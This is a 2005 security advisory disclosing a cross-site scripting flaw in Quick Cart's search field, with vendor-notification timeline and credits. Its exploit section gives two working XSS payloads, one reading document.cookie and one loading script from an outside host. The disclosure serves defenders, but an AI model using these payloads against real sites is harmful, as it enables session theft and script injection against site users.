Quick Cart Search field cross site scripting and script insercion

#####################################################
Quick Cart Search field cross site scripting and script insercion
vendor url:http://www.quickcart.com/
advisore:http://lostmon.blogspot.com/2005/05/
quick-cart-search-field-cross-site.html
vendor notify: yes exploit available: yes
Securitytracker:1014076
#####################################################

Quick Cart contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate the 'search' field upon
submission to 'search.cfm' script.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.


############
versions
############

free edition affected:
https://www.quickcart.com/qc_checkout.cfm


but is posible other versions ( standar or others) are afected


################
solution
################

no solution was available at this time

#############
Timeline
#############

discovered: 10 may 2005
vendor notify: 27 may 2005
vendor response: 27 may 2005
disclosure: 29 may 2005

##############
exploit
##############

put in the search box of the store:

//"><script>alert(document.cookie)</script>

or

//"><SCRIPT src="http://www.drorshalev.com/dev/injection/js.js"></script>

and the script is executing , this is a XSS flaw
and a posible script insercion


#################### €nd ###################

Thnx to http://www.drorshalev.com for this script
and for hosting it for this demostration.

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente